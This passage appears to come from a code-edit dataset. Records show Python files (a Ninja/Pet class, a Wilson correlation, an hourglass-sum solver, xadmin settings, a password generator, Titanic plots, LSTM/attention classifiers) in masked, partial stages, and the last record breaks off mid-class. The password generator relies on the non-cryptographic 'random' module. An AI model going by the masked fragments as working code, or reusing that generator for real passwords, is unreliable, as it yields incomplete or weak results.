"step-4": "<mask token>\n\n\nclass Ninja:\n\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n def walk(self):\n self.pet.play()\n\n def feed(self):\n self.pet.eat()\n\n def bathe(self):\n self.pet.noise()\n\n\nFox = Pet('Ninetailed Fox', 'Fox', 'Fire-Breathing')\nNaruto = Ninja('Naruto', 'Izumaki', 'Rice Balls', 'Ground Beef', Fox)\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\n",
"step-5": "from pet import Pet \n\nclass Ninja:\n def __init__(self, first_name, last_name, treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n\n def walk(self):\n self.pet.play()\n\n\n def feed(self):\n self.pet.eat()\n\n\n def bathe(self):\n self.pet.noise()\n\n\n\nFox = Pet(\"Ninetailed Fox\", \"Fox\", \"Fire-Breathing\")\nNaruto = Ninja(\"Naruto\", \"Izumaki\", \"Rice Balls\", \"Ground Beef\", Fox)\n\n\nNaruto.feed()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)\nNaruto.bathe()\nNaruto.walk()\nprint(Naruto.pet.energy)\nprint(Naruto.pet.health)",
"step-ids": [
3,
5,
6,
7,
9
]
}
|
[
3,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def K_Wilson(w, Tr, Pr):
import numpy as np
K_value_Output = 1 / Pr * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))
return K_value_Output
<|reserved_special_token_1|>
def K_Wilson(w, Tr, Pr):
# Inserting necessary libraries
import numpy as np
# Calculating K-value using Wilson correlation
K_value_Output = (1 / Pr) * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))
# Returning output value
return K_value_Output
|
flexible
|
{
"blob_id": "0b42f458097d11d66160bcb8e706ccb9b5c4682a",
"index": 5744,
"step-1": "<mask token>\n",
"step-2": "def K_Wilson(w, Tr, Pr):\n import numpy as np\n K_value_Output = 1 / Pr * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))\n return K_value_Output\n",
"step-3": "def K_Wilson(w, Tr, Pr):\r\n \r\n # Inserting necessary libraries\r\n import numpy as np\r\n \r\n # Calculating K-value using Wilson correlation\r\n K_value_Output = (1 / Pr) * np.exp(5.37 * (1 + w) * (1 - 1 / Tr))\r\n \r\n # Returning output value\r\n return K_value_Output",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import sys
import math
def get_max_sum(arr):
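    # Scan every "hourglass" in the 6x6 grid (top row of three, centre cell, bottom row of three) and keep the largest sum.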
max_sum = -math.inf
for i in range(1, 5):
for j in range(1, 5):
temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][
j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]
max_sum = max(max_sum, temp)
return max_sum
def main():
sys_in = sys.stdin
sys_out = sys.stdout
arr = []
for _ in range(6):
temp = list(map(int, sys.stdin.readline().split()))
arr.append(temp)
print(get_max_sum(arr))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "c99f1333c5ca3221e9932d9a9ba1d95a77924f0d",
"index": 351,
"step-1": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport math\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BaseMyAdminView(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GlobalSettings(object):
"""
    site_title: name shown at the top left
    site_footer: name shown in the footer
    menu_style: style of the left-hand menu
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseMyAdminView(object):
"""
    enable_themes: allow switching the admin theme
    use_bootswatch: enable themes fetched from the web
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
    site_title: name shown at the top left
    site_footer: name shown in the footer
    menu_style: style of the left-hand menu
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseMyAdminView(object):
"""
    enable_themes: allow switching the admin theme
    use_bootswatch: enable themes fetched from the web
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
    site_title: name shown at the top left
    site_footer: name shown in the footer
    menu_style: style of the left-hand menu
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
<|reserved_special_token_1|>
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseMyAdminView(object):
"""
    enable_themes: allow switching the admin theme
    use_bootswatch: enable themes fetched from the web
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
    site_title: name shown at the top left
    site_footer: name shown in the footer
    menu_style: style of the left-hand menu
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
<|reserved_special_token_1|>
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseMyAdminView(object):
'''
    enable_themes: allow switching the admin theme
    use_bootswatch: enable themes fetched from the web
'''
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
'''
    site_title: name shown at the top left
    site_footer: name shown in the footer
    menu_style: style of the left-hand menu
'''
site_title = "学习网后台管理系统"
site_footer = "学习网"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
|
flexible
|
{
"blob_id": "d7b830890400203ee45c9ec59611c0b20ab6bfc7",
"index": 8496,
"step-1": "<mask token>\n\n\nclass BaseMyAdminView(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n",
"step-4": "import xadmin\nfrom xadmin import views\nfrom .models import EmailVerifyRecord, Banner\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n",
"step-5": "import xadmin\nfrom xadmin import views\n\nfrom .models import EmailVerifyRecord, Banner\n\n\nclass BaseMyAdminView(object):\n '''\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n '''\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n '''\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n '''\n site_title = \"学习网后台管理系统\"\n site_footer = \"学习网\"\n menu_style = \"accordion\"\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
<|reserved_special_token_0|>
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if getnum < 7:
    print('Error 205: Too few characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
<|reserved_special_token_0|>
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
getnum = int(input('Pick a number of at least 7: '))
if getnum < 7:
    print('Error 205: Too few characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
lista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',
'2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',
'//', '\\']
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
import random
getnum = int(input('Pick a number of at least 7: '))
if getnum < 7:
    print('Error 205: Too few characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
lista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',
'2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',
'//', '\\']
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
# Importing the random library for random choice.
import random
getnum = int(input("Pick a number greater than 7: "))
# Error checking.
if (getnum < 7):
print("Error 205: Too little characters entered")
print("Run again using python passwordgenerator.py, or click the run button on your IDE.")
exit()
# Character pool the password is drawn from: letters, digits, and symbols.
lista = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','#', '@', '!', '%','^', '//', '\\']
# Main function takes two params: the character pool (lista) and the password length (getnum).
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
# Ask whether to generate another password; re-prompt on unrecognised input.
def passwordagain():
again = input("Do you want to generate another password(y/n)?: ")
if (again == 'y'):
main(lista,getnum)
elif(again == 'n'):
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
|
flexible
|
{
"blob_id": "c40bb410ad68808c2e0cc636820ec6a2ec2739b8",
"index": 4053,
"step-1": "<mask token>\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\n<mask token>\n",
"step-2": "<mask token>\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\n<mask token>\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-3": "<mask token>\ngetnum = int(input('Pick a number greater than 7: '))\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\nlista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',\n '2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',\n '//', '\\\\']\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-4": "import random\ngetnum = int(input('Pick a number greater than 7: '))\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\nlista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',\n '2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',\n '//', '\\\\']\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-5": "# Importing the random library for random choice.\nimport random\ngetnum = int(input(\"Pick a number greater than 7: \"))\n# Error checking.\nif (getnum < 7):\n print(\"Error 205: Too little characters entered\")\n print(\"Run again using python passwordgenerator.py, or click the run button on your IDE.\")\n exit()\n# A list of random things.\nlista = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','#', '@', '!', '%','^', '//', '\\\\']\n# Main function takes two params, lista and get num.\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n#Password again.\ndef passwordagain():\n again = input(\"Do you want to generate another password(y/n)?: \")\n if (again == 'y'):\n main(lista,getnum)\n elif(again == 'n'):\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\nmain(lista, getnum)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib as mp
data = pd.read_csv("/Users/stevenbaez/Desktop/train.csv")
# In[2]:
data.head()
# In[3]:
subset = data[['Survived','Age', 'Sex']]
# In[5]:
import numpy as np
import matplotlib
# In[20]:
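# Box plots of passenger age by sex and survival outcome, one panel per embarkation port.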
sb.catplot(x="Age", y="Sex",
hue="Survived", col="Embarked",
notch = False,
palette = "Set2",
data=data, kind="box",
height=4, aspect=.7);
# In[17]:
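# Same view faceted by passenger class instead, with notched boxes.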
sb.catplot(x="Age", y="Sex",
hue="Survived", col="Pclass",
notch = True,
palette = "Set2",
data=data, kind="box",
height=4, aspect=.7);
# In[ ]:
|
normal
|
{
"blob_id": "41006ff35299aa72b69c6dc1c71a45b44dca7d6c",
"index": 1184,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndata.head()\n<mask token>\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-3": "<mask token>\ndata = pd.read_csv('/Users/stevenbaez/Desktop/train.csv')\ndata.head()\nsubset = data[['Survived', 'Age', 'Sex']]\n<mask token>\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport seaborn as sb\nimport matplotlib as mp\ndata = pd.read_csv('/Users/stevenbaez/Desktop/train.csv')\ndata.head()\nsubset = data[['Survived', 'Age', 'Sex']]\nimport numpy as np\nimport matplotlib\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sb\nimport matplotlib as mp\n\ndata = pd.read_csv(\"/Users/stevenbaez/Desktop/train.csv\")\n\n\n# In[2]:\n\n\ndata.head()\n\n\n# In[3]:\n\n\nsubset = data[['Survived','Age', 'Sex']]\n\n\n# In[5]:\n\n\nimport numpy as np\nimport matplotlib\n\n\n# In[20]:\n\n\nsb.catplot(x=\"Age\", y=\"Sex\",\n hue=\"Survived\", col=\"Embarked\",\n notch = False,\n palette = \"Set2\",\n data=data, kind=\"box\",\n height=4, aspect=.7);\n\n\n# In[17]:\n\n\nsb.catplot(x=\"Age\", y=\"Sex\",\n hue=\"Survived\", col=\"Pclass\",\n notch = True,\n palette = \"Set2\",\n data=data, kind=\"box\",\n height=4, aspect=.7);\n\n\n# In[ ]:\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class classifier(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
<|reserved_special_token_0|>
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
